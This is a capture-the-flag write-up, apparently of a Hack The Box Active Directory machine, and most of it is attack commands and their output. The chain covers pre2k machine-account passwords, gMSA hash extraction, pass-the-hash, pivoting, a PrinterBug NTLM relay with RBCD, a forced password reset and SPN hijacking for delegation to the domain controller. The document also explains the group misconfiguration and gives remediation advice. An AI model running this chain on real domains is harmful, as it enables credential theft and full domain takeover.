LDAP        10.129.7.169    389    DC01             $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\gMSA_ADFS_prod$*$c7...fc3d

好像没什么用,查看一下groups

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --groups
LDAP        10.129.7.169    389    DC01             Pre-Windows 2000 Compatible Access       membercount: 4

发现有趣的组:Pre-Windows 2000 Compatible Access

In Active Directory (AD), Pre-Windows 2000 Compatible Access (a security group with the Security Identifier (SID) S-1-5-32-554) is not primarily associated with code-level execution vulnerabilities. Instead, it represents an extremely dangerous Security Misconfiguration that can lead to severe Information Disclosure and pave the way for internal network penetration and privilege escalation.

This group was originally designed to allow older operating systems like Windows NT 4.0 to query AD information. Its core security risks manifest in the following ways:

1. Default Overly Permissive Read Access

This group possesses broad Read permissions at the root level of Active Directory. Specifically, members of this group can read the attributes of nearly all user and group objects within the domain.

  • Danger Point: In domain environments upgraded from earlier systems (like Windows Server 2000 or 2003), by default, Everyone and Authenticated Users are often members of this group.
  • Penetration Testing Perspective: This means any attacker possessing even a low-privileged domain account (as they belong to Authenticated Users), or in some configurations, even unauthenticated attackers (if Everyone includes anonymous logons), can query the entire domain schema unrestricted via the Lightweight Directory Access Protocol (LDAP).

2. Anonymous Directory Enumeration

If Everyone belongs to this group and the domain controller allows Null Sessions or anonymous LDAP bindings:

  • An attacker can connect directly to the domain controller over the network without obtaining any credentials.
  • Using tools like rpcclient or LDAP queries, the attacker can enumerate all usernames, group lists, and even detailed Description fields for certain users.
  • Hazard: The Description field often inadvertently contains plaintext passwords, the purposes of service accounts, or other sensitive internal network information.

3. Facilitating Advanced Domain Attacks

The unrestricted information-gathering capability provided by the Pre-Windows 2000 Compatible Access group is the cornerstone for executing advanced follow-up attacks. Attackers can easily collect the following information to devise an attack path:

  • Targeting: Quickly identify members of high-privilege groups like Domain Admins and Enterprise Admins.
  • Kerberoasting: Enumerate service accounts with a Service Principal Name (SPN) attribute, request their Service Tickets, and perform offline password cracking.
  • AS-REP Roasting: Query all users configured with the “Do not require Kerberos preauthentication” attribute and perform offline hash cracking against them.
  • BloodHound Pathfinding: The group’s permissions are sufficient for BloodHound to collect the majority of node relationship graphs, enabling the calculation of the Shortest Path to Domain Admin from a regular user.

4. Persistence & Backdoors

In Red Team Operations, if attackers gain high privileges, they might intentionally add regular users or specific backdoor accounts to the Pre-Windows 2000 Compatible Access group. Because it is a built-in system group with a name that sounds like a “compatibility” legacy feature, Blue Teams or system administrators often overlook it during audits, allowing attackers to maintain covert surveillance permissions over domain information.


Remediation Recommendations & Defensive Measures:

As a defender or when issuing a penetration test report, the following remediation measures should be recommended:

  1. Clean up group members: Open “Active Directory Users and Computers” (ADUC), check the members of the Pre-Windows 2000 Compatible Access group. Remove Everyone, Anonymous Logon, and Authenticated Users.
  2. Add cautiously: Unless there are extremely old legacy systems in the internal network (which usually no longer exist), this group should remain empty.
  3. Disable anonymous LDAP: Ensure that anonymous LDAP bind operations are disabled in the registry or group policy on the domain controller.

Exploitation

Since we are in the AUTHENTICATED USERS@PIRATE.HTB (which belongs to Pre-Windows 2000 Compatible Access), it effectively means we can read all information.

ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txt

Attempt to read leaked passwords.

grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
# No results found

Attempt to read GMSA passwords.

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
# Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure Servers

Only the group Domain Secure Servers can read it. Query for users in this group.

ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
# Returns member: CN=MS01,CN=Computers,DC=pirate,DC=htb

Only MS01 can read it.


Pre2K

A Google search reveals the nxc pre2k module.

By default, when a computer joins a domain, the domain controller automatically generates a 120-character, fully random machine account password (which typically auto-rolls every 30 days), making brute-forcing machine accounts nearly impossible.

However, the Active Directory Users and Computers (ADUC) management tool has always retained a checkbox for compatibility with ancient NT systems: “Assign this computer account as a pre-Windows 2000 computer”.

If an administrator checks this box when manually pre-creating a computer account (e.g., before assigning a physical machine, just creating a placeholder in AD), something extremely absurd happens: AD does not generate a random password, but instead uses the lowercase of the computer name as its initial password!

  • For example: If a new machine account named SERVERDEMO$ is created, its password is serverdemo.
  • Our target is named MS01$. If it is vulnerable to this, its password would be ms01!

Exploitation

nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
# MS01$ and EXCH01$

Read GMSA

nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsa
Account: gMSA_ADCS_prod$      NTLM: 304106f739822ea2ad8ebe23f802d078     
Account: gMSA_ADFS_prod$      NTLM: 8126756fb2e69697bfcb04816e685839    

USER

Connect with evil-winrm.

evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htb

Check the network.

*Evil-WinRM* PS C:\Users> ipconfig

Windows IP Configuration

Ethernet adapter vEthernet (Switch01):

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
   IPv4 Address. . . . . . . . . . . : 192.168.100.1
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : .htb
   IPv4 Address. . . . . . . . . . . : 10.129.7.169
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.129.0.1

Setting up the ligolo-ng bridge

For setup instructions, refer to the ligolo-ng official website.

Find live hosts.

nxc smb 192.168.100.0/24
SMB         192.168.100.1   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB         192.168.100.2   445    WEB01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)

Discovered WEB01, and SMB signing is disabled. This indicates that an NTLM relay attack might be possible.

Query for printer services.

nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
# Returns Spooler service enabled

Prepare for relay.

sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
# --remove-mic Message Integrity Code

Configure forwarding in ligolo.

[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add  --addr 0.0.0.0:8888 --to 127.0.0.1:445

Execute the attack.

python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34

After gaining access, an RBCD attack was executed, obtaining privileges on the WEB01 machine.

image 138.png

Using the credentials XUPXYXWJ$:Mvb0i(gL8v$>{PG to obtain the administrator’s TGT, then exported the nthash.

impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
# Obtained a.white : E2nvAOKSz5Xz2MJu

ROOT

According to BloodHound: a.white has ForceChangePassword permission over a.white_ADM.

bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
# [+] Password changed successfully!

a.white_ADM belongs to the IT group and has WriteSPN permission over DC01.PIRATE. Identify the delegation relationships.

impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1
AccountName  AccountType  DelegationType                      DelegationRightsTo     SPN Exists
-----------  -----------  ----------------------------------  ---------------------  ----------
DC01$        Computer     Unconstrained                       N/A                    Yes
a.white_adm  Person       Constrained w/ Protocol Transition  http/WEB01.pirate.htb  Yes
a.white_adm  Person       Constrained w/ Protocol Transition  HTTP/WEB01             Yes
XUPXYXWJ$    Computer     Resource-Based Constrained          WEB01$                 No

SPN Hijacking

  • The user a.white_adm is allowed to access the HTTP service on WEB01 on behalf of anyone (with Protocol Transition).
  • a.white_adm has WriteSPN permission over DC01.

Exploiting the uniqueness of SPNs, transfer the delegation rights originally meant for WEB01 to DC01, thereby allowing a.white_adm to access DC01 as an administrator.

Remove the SPN from WEB01.

python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb'  -r --spn 'http/WEB01.pirate.htb'
# Returns SPN Modified successfully

Transfer it.

python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
# Returns SPN Modified successfully

Obtain the ticket.

impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
# Returns Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
# The -altservice parameter bypasses the protocol transition restriction

Since TGTs are long-term, the DC trusts them.

impacket-smbclient -k -no-pass DC01.pirate.htb

This allows obtaining root.